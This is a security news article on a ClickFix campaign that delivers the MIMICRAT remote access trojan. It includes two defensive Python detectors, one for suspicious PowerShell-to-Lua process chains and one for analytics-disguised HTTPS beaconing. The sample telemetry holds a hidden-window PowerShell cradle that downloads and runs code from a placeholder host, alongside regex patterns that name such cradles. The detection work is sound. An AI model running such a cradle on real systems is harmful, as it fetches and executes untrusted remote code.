ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands

Elastic Security Labs has disclosed a new ClickFix campaign that leverages compromised legitimate websites as delivery infrastructure to deploy a previously undocumented remote access trojan dubbed MIMICRAT (also tracked as AstarionRAT).

The campaign, discovered earlier this month, demonstrates significant operational sophistication — from multi-stage PowerShell chains that bypass Windows security controls to a custom C++ implant that communicates over HTTPS using HTTP profiles designed to mimic legitimate web analytics traffic.

The suspected end goal is ransomware deployment or data exfiltration.

Compromised Legitimate Sites as Delivery Infrastructure

The infection chain begins with compromised websites spanning multiple industries and geographies. In the case documented by Elastic, the entry point was bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript.

The injected script loads an externally hosted PHP script that serves a fake Cloudflare verification page — the signature ClickFix social engineering technique — instructing the victim to copy and paste a command into the Windows Run dialog to "verify" themselves.

The campaign supports 17 languages, with lure content dynamically localized based on the victim's browser language settings to maximize reach. Identified victims span multiple geographies, including a U.S.-based university and Chinese-speaking users documented in public forum discussions.

Multi-Stage Evasion Chain

The ClickFix lure triggers a PowerShell execution chain designed to systematically dismantle Windows defensive controls before payload delivery:

  1. Initial PowerShell command contacts the C2 server to retrieve a second-stage script
  2. ETW patching — disables Windows Event Tracing to blind security monitoring
  3. AMSI bypass — patches the Antimalware Scan Interface to prevent PowerShell script detection
  4. Lua-based loader — drops a Lua scripting engine that decrypts and executes shellcode entirely in memory
  5. MIMICRAT deployment — the final payload is loaded without touching disk
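On an endpoint, the first three steps of that chain show up as a process tree: explorer.exe (the parent of anything launched from the Run dialog) spawning powershell.exe with a download cradle, followed within seconds by a Lua interpreter running as its child. The Python below is an added illustration of that correlation and is not taken from Elastic's report or from the campaign's tooling. The events mimic Sysmon Event ID 1 with simplified field names (image, parent_image, cmdline, guid, parent_guid); every host name, path, GUID, timestamp and the example.invalid URL is constructed.

```python
"""Correlate Run-dialog PowerShell with a later Lua interpreter in one process tree.

Added example (not Elastic's or the campaign's code). Events mimic Sysmon
Event ID 1 with simplified field names; all sample data is constructed.
"""
import re
from datetime import datetime, timedelta

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry: one ClickFix chain on ws01
# (explorer.exe -> powershell.exe cradle -> lua54.exe) and one benign
# administrative PowerShell launch from a console on ws02.
EVENTS = [
    {"ts": "2025-05-02T10:00:00", "host": "ws01", "guid": "A1", "parent_guid": "A0",
     "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"ts": "2025-05-02T10:01:10", "host": "ws01", "guid": "A2", "parent_guid": "A1",
     "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify -UseBasicParsing).Content"'},
    {"ts": "2025-05-02T10:01:25", "host": "ws01", "guid": "A3", "parent_guid": "A2",
     "image": r"C:\Users\alice\AppData\Local\Temp\lua54.exe", "parent_image": PS,
     "cmdline": r"lua54.exe C:\Users\alice\AppData\Local\Temp\s.lua"},
    {"ts": "2025-05-02T10:05:00", "host": "ws02", "guid": "B1", "parent_guid": "B0",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe"},
    {"ts": "2025-05-02T10:05:30", "host": "ws02", "guid": "B2", "parent_guid": "B1",
     "image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -File C:\ops\inventory.ps1"},
]

# Parents that a Run-dialog or HTA-based ClickFix lure produces.
CLICKFIX_PARENTS = {"explorer.exe", "mshta.exe"}
# Download-cradle and hidden-window markers typical of pasted ClickFix commands.
CRADLE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|\biex\b|invoke-expression"
    r"|downloadstring|\biwr\b|invoke-webrequest|https?://)", re.I)
# Standalone Lua interpreters (lua.exe, lua54.exe, luajit.exe, ...).
LUA = re.compile(r"(^|\\)lua(jit)?[\d.]*\.exe$", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_powershell(ev):
    """PowerShell launched directly by explorer.exe/mshta.exe with a cradle."""
    return (basename(ev["image"]) in {"powershell.exe", "pwsh.exe"}
            and basename(ev["parent_image"]) in CLICKFIX_PARENTS
            and CRADLE.search(ev["cmdline"]) is not None)


def is_lua_interpreter(ev):
    return LUA.search(ev["image"]) is not None


def ancestors(ev, by_guid):
    """Walk parent GUIDs upward; stops at unknown parents or loops."""
    out, seen = [], set()
    cur = by_guid.get(ev["parent_guid"])
    while cur and cur["guid"] not in seen:
        seen.add(cur["guid"])
        out.append(cur)
        cur = by_guid.get(cur["parent_guid"])
    return out


def detect(events, window=timedelta(minutes=10)):
    """Return (rule, host, guid) findings; the chain rule points at the PowerShell event."""
    by_guid = {e["guid"]: e for e in events}
    findings = []
    for ev in events:
        if is_clickfix_powershell(ev):
            findings.append(("clickfix_powershell", ev["host"], ev["guid"]))
        if is_lua_interpreter(ev):
            findings.append(("lua_interpreter", ev["host"], ev["guid"]))
            t = datetime.fromisoformat(ev["ts"])
            for anc in ancestors(ev, by_guid):
                if (is_clickfix_powershell(anc)
                        and t - datetime.fromisoformat(anc["ts"]) <= window):
                    findings.append(("clickfix_lua_chain", ev["host"], anc["guid"]))
                    break
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

The two single-signal rules are noisy on their own (an admin running a cradle, a developer with a Lua toolchain); the chain rule, which requires the interpreter to descend from a Run-dialog PowerShell within the window, is the one worth paging on.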

MIMICRAT Capabilities

MIMICRAT is a custom C++ implant with a comprehensive feature set across 22 commands for post-exploitation operations:

  • Windows token impersonation — escalate privileges by stealing tokens from other processes
  • SOCKS5 proxy tunneling — route attacker traffic through the victim's network
  • Process and file system control — enumerate, create, modify, and terminate processes and files
  • Interactive shell access — direct command-line access to the compromised system
  • Shellcode injection — inject and execute arbitrary code in remote processes
  • HTTPS C2 communication — all traffic flows over port 443 using HTTP profiles that resemble legitimate web analytics, blending into normal network traffic

Elastic assesses that the campaign shares tactical and infrastructural overlaps with a separate ClickFix campaign documented by Huntress that deploys the Matanbuchus 3.0 loader. That loader serves as a delivery mechanism for the same MIMICRAT implant, suggesting a shared operator or affiliate relationship between the two campaigns.

IOCs

  • Compromised site: bincheck[.]io
  • C2 communication: HTTPS over port 443 with web analytics-style HTTP profiles
  • Loader: Lua-based in-memory shellcode decryptor
  • Implant: MIMICRAT/AstarionRAT (C++ RAT, 22 commands)

Defender Recommendations

  • Monitor for ClickFix patterns — alert on PowerShell launched from the Windows Run dialog (parent process explorer.exe) or from mshta.exe, particularly when it follows browser activity and carries a download cradle or hidden-window switch
  • Detect ETW and AMSI tampering — flag processes that patch EtwEventWrite or AmsiScanBuffer in memory
  • Hunt for Lua script execution — Lua interpreters running in enterprise environments are anomalous and should be investigated
  • Inspect HTTPS traffic — look for C2 beaconing patterns disguised as web analytics on port 443
  • Block known infrastructure — add bincheck[.]io to blocklists until confirmed remediated
  • Review ClickFix awareness training — remind users that legitimate services never ask them to paste commands into the Run dialog
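Because the C2 profile is built to look like analytics traffic, inspecting request content is of limited use; the recommendation to hunt for beaconing on port 443 comes down to timing and destination. The Python below is an added example, not one of Elastic's detections: it parses constructed proxy-log lines and flags source/destination pairs on port 443 whose request intervals are nearly constant and whose destination is not a known analytics provider. The log format, the allowlist, the analytics-style URI patterns, the thresholds and every host name are constructed; MIMICRAT's actual URIs and beacon intervals are not given on this page.

```python
"""Flag periodic HTTPS 'analytics' traffic that behaves like C2 beaconing.

Added example, not from Elastic's report. Log format, hosts, allowlist and
thresholds are constructed assumptions.
"""
import re
import statistics
from datetime import datetime

# Constructed proxy log: ws01 beacons every ~60 s to an unknown host with an
# analytics-style URI; ws02 talks to a real analytics host irregularly;
# ws03 talks to that host regularly (allowlisted); ws01 also checks updates once.
LOG = """\
2025-05-02T10:00:05Z ws02 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:00:07Z ws02 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:02:00Z ws01 cdn-metrics.example.invalid:443 POST /collect?v=1&tid=UA-0000
2025-05-02T10:03:02Z ws01 cdn-metrics.example.invalid:443 POST /collect?v=1&tid=UA-0000
2025-05-02T10:03:40Z ws02 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:03:41Z ws02 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:04:01Z ws01 cdn-metrics.example.invalid:443 POST /collect?v=1&tid=UA-0000
2025-05-02T10:05:00Z ws01 cdn-metrics.example.invalid:443 POST /collect?v=1&tid=UA-0000
2025-05-02T10:06:03Z ws01 cdn-metrics.example.invalid:443 POST /collect?v=1&tid=UA-0000
2025-05-02T10:06:58Z ws01 cdn-metrics.example.invalid:443 POST /collect?v=1&tid=UA-0000
2025-05-02T10:08:01Z ws01 cdn-metrics.example.invalid:443 POST /collect?v=1&tid=UA-0000
2025-05-02T10:09:00Z ws01 cdn-metrics.example.invalid:443 POST /collect?v=1&tid=UA-0000
2025-05-02T10:09:10Z ws02 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:10:00Z ws01 updates.example.invalid:443 GET /version.json
2025-05-02T10:15:02Z ws02 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:15:03Z ws02 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:20:00Z ws03 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:20:30Z ws03 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:21:00Z ws03 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:21:30Z ws03 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:22:00Z ws03 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
2025-05-02T10:22:30Z ws03 www.google-analytics.com:443 POST /collect?v=2&tid=G-XXXX
"""

LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>[^:\s]+):(?P<port>\d+) "
                  r"(?P<method>\S+) (?P<uri>\S+)$")

# Constructed allowlist of destinations expected to receive analytics traffic.
KNOWN_ANALYTICS = {"www.google-analytics.com", "analytics.google.com",
                   "stats.g.doubleclick.net"}
# URI shapes that imitate analytics endpoints (assumed, not MIMICRAT's real paths).
ANALYTICS_URI = re.compile(r"^/(g/collect|collect|gtag/js|analytics\.js|pixel|track|beacon)\b")


def parse(log):
    return [m.groupdict() for m in map(LINE.match, log.splitlines()) if m]


def find_beacons(events, min_count=6, max_cv=0.15):
    """Return (src, dst) pairs on 443 with low interval jitter to non-allowlisted hosts.

    cv is the coefficient of variation of the inter-request gaps: 0 means a
    perfectly fixed cadence, which human-driven traffic almost never shows.
    """
    groups = {}
    for e in events:
        if e["port"] == "443":
            groups.setdefault((e["src"], e["dst"]), []).append(e)
    findings = []
    for (src, dst), evs in sorted(groups.items()):
        if len(evs) < min_count or dst in KNOWN_ANALYTICS:
            continue
        times = sorted(datetime.fromisoformat(e["ts"].replace("Z", "+00:00")) for e in evs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            findings.append({
                "src": src, "dst": dst, "count": len(evs),
                "mean_gap": round(mean, 1), "cv": round(cv, 3),
                "analytics_like_uri": any(ANALYTICS_URI.search(e["uri"]) for e in evs),
            })
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse(LOG)):
        print(f)
```

The analytics-looking URI is reported as context, not used as a trigger: the page's point is that the profile is meant to pass as analytics, so a path match proves nothing by itself. Real implants add jitter and sleep skew, so in production the cv threshold and minimum count need tuning against a baseline of your own egress, and the allowlist should be keyed on the TLS SNI or proxy host header rather than a resolved IP.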

By Zero Day Wire